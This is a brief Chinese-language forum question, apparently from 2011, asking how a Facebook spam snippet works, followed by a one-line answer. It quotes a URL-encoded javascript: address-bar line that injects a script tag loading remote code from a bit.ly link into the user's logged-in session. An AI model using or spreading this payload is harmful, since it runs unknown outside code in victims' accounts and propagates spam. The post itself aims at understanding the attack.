所以,我刚刚在Facebook上看到了这个使用JavaScript编写的垃圾邮件代码,我想知道是否有人能向我解释代码如何工作,并与Facebook进行交互。我不打算将其用于恶意目的,但我只是对Facebook等网站的安全感兴趣。这里是从地址栏执行的代码(我建议不要自己尝试,最终可能会有一些烦人的朋友)。Facebook垃圾代码的说明
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
它将脚本标记注入到从其他Web站点获取的源代码中。 – 2011-06-05 21:01:20